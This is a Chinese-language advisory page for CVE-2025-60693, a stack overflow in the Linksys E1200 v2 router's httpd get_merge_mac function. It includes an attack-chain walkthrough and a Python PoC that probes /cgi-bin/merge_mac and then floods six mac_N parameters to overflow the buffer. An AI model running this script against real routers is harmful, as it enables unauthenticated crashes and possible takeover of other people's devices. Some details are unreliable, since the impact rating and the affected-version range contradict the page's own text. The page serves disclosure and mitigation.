CVE-2025-60693 Linksys E1200 v2 路由器 httpd get_merge

漏洞信息

漏洞编号

CVE-2025-60693

漏洞类型

栈缓冲区溢出

CVSS评分

6.5 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Linksys E1200 v2 路由器

漏洞概述

CVE-2025-60693是存在于Linksys E1200 v2路由器固件（E1200_v2.0.11.001_us.tar.gz）httpd二进制文件中的一个中等严重性安全漏洞。该漏洞位于get_merge_mac函数中，由于该函数在处理用户输入的CGI参数时存在栈缓冲区溢出问题，远程攻击者可以在无需任何认证的情况下利用此漏洞。攻击者通过构造包含多个特定格式参数（<parameter>_0到<parameter>_5）的恶意HTTP请求，可以触发栈缓冲区溢出，从而实现任意代码执行或导致设备拒绝服务。此漏洞影响路由器的机密性（低影响）和可用性（低影响），但不影响完整性。由于该漏洞可被远程利用且无需认证，因此对暴露在网络中的Linksys E1200 v2设备构成较大安全风险。攻击者可以利用此漏洞完全控制受影响的路由器设备。

技术细节

该漏洞的根本原因在于Linksys E1200 v2路由器httpd二进制文件中的get_merge_mac函数存在不安全的缓冲区操作。具体分析如下：

1. 漏洞位置：get_merge_mac函数
2. 漏洞类型：基于栈的缓冲区溢出（Stack-based Buffer Overflow）
3. 根本原因：函数将最多6个用户提供的CGI参数（格式为<parameter>_0、<parameter>_1...<parameter>_5）连接到一个固定大小的栈缓冲区（参数a2）中，在连接过程中使用冒号作为分隔符。
4. 安全缺陷：函数在执行字符串连接操作时未进行边界检查（缺乏长度验证），当用户输入的总长度超过缓冲区大小时，就会发生栈缓冲区溢出。
5. 利用方式：攻击者构造包含超长参数值的HTTP请求，例如：GET /cgi-bin/merge_mac?mac_0=AAAA...AAA&mac_1=BBBB...BBB&...&mac_5=CCCC...CCC，其中参数值长度精心构造以覆盖栈上的返回地址或关键数据。
6. 影响后果：成功利用可导致任意代码执行（通过覆盖返回地址跳转到恶意shellcode）或拒绝服务（导致程序崩溃）。由于是栈溢出，攻击者可以控制程序执行流程。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标为Linksys E1200 v2路由器，并确认其固件版本为E1200_v2.0.11.001_us.tar.gz。通过端口扫描发现HTTP服务（端口80）开放。

STEP 2

步骤2: 漏洞识别

攻击者发现路由器存在/cgi-bin/merge_mac端点，该端点调用get_merge_mac函数处理CGI参数。函数接受参数格式为<parameter>_0到<parameter>_5。

STEP 3

步骤3: 构造恶意请求

攻击者构造包含超长参数值的HTTP GET请求。参数包括mac_0到mac_5，每个参数值长度精心设计，总长度超过get_merge_mac函数中固定大小栈缓冲区（a2）的容量。

STEP 4

步骤4: 触发缓冲区溢出

当路由器httpd进程处理恶意请求时，get_merge_mac函数将6个参数值与冒号分隔符连接。由于缺乏边界检查，字符串操作超出缓冲区边界，覆盖栈上的返回地址和保存的寄存器值。

STEP 5

步骤5: 代码执行或拒绝服务

攻击者通过覆盖返回地址将执行流重定向到恶意shellcode，实现远程代码执行。或者通过使栈数据损坏导致程序崩溃，造成拒绝服务。

STEP 6

步骤6: 持久化控制

成功执行代码后，攻击者可以在路由器上安装后门、修改DNS设置、嗅探网络流量或将其纳入僵尸网络。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-60693 PoC - Linksys E1200 v2 get_merge_mac Stack Buffer Overflow
# Target: Linksys E1200 v2 router (Firmware E1200_v2.0.11.001_us.tar.gz)
# Vulnerability: Stack-based buffer overflow in get_merge_mac function

def exploit_cve_2025_60693(target_ip, target_port=80):
    """
    Exploit for CVE-2025-60693
    This PoC demonstrates the buffer overflow by sending oversized parameters.
    Modify the payload based on actual firmware analysis.
    """
    base_url = f"http://{target_ip}:{target_port}"
    
    # Generate oversized parameters to trigger overflow
    # The function concatenates parameters _0 to _5 with colon delimiters
    # Total length exceeding the fixed buffer size will cause overflow
    overflow_length = 1024  # Adjust based on buffer size analysis
    padding = 'A' * overflow_length
    
    # Construct malicious CGI parameters
    params = {
        'mac_0': padding,
        'mac_1': padding,
        'mac_2': padding,
        'mac_3': padding,
        'mac_4': padding,
        'mac_5': padding
    }
    
    try:
        # Send crafted HTTP request
        response = requests.get(f"{base_url}/cgi-bin/merge_mac", params=params, timeout=10)
        print(f"[*] Request sent to {base_url}/cgi-bin/merge_mac")
        print(f"[*] Response status: {response.status_code}")
    except requests.exceptions.Timeout:
        print("[*] Request timed out - possible successful exploitation")
    except Exception as e:
        print(f"[!] Error: {e}")

def check_vulnerability(target_ip, target_port=80):
    """
    Check if target is vulnerable to CVE-2025-60693
    """
    base_url = f"http://{target_ip}:{target_port}"
    
    # Small test payload to check if merge_mac endpoint exists
    test_params = {
        'mac_0': 'test',
        'mac_1': 'test'
    }
    
    try:
        response = requests.get(f"{base_url}/cgi-bin/merge_mac", params=test_params, timeout=5)
        if response.status_code == 200:
            print(f"[*] Target {target_ip} has merge_mac endpoint")
            print(f"[*] Target may be vulnerable - proceed with exploitation")
            return True
        else:
            print(f"[*] Endpoint returned status {response.status_code}")
            return False
    except Exception as e:
        print(f"[!] Error checking vulnerability: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve_2025_60693_poc.py <target_ip> [port]")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
    
    print(f"[*] Checking vulnerability on {target}...")
    if check_vulnerability(target, port):
        print(f"[*] Attempting exploitation...")
        exploit_cve_2025_60693(target, port)

影响范围

Linksys E1200 v2 < 固件版本 E1200_v2.0.11.001_us

防御指南

临时缓解措施

在制造商发布官方修复补丁之前，建议采取以下临时缓解措施：1) 将Linksys E1200 v2路由器放置在防火墙后的受保护网络段，限制从互联网直接访问；2) 禁用路由器的远程管理功能，改为仅通过本地网络访问；3) 使用访问控制列表（ACL）限制可访问路由器管理界面的IP地址范围；4) 监控路由器日志，关注异常的HTTP请求模式；5) 考虑使用VPN进行远程管理访问，避免将管理接口直接暴露在公网；6) 如果业务允许，考虑更换为仍有安全支持的路由器设备。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-60693
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-60693
3 Details https://www.cvedetails.com/cve/CVE-2025-60693/
4 VulDB https://vuldb.com/cve/CVE-2025-60693
5 Link http://linksys.com
6 Link https://github.com/yifan20020708/SGTaint-0-day/blob/main/Linksys/Linksys-E1200/CVE-2025-60693.md
7 Link https://www.linksys.com/

CVE-2025-60693 Linksys E1200 v2 路由器 httpd get_merge_mac 函数栈缓冲区溢出漏洞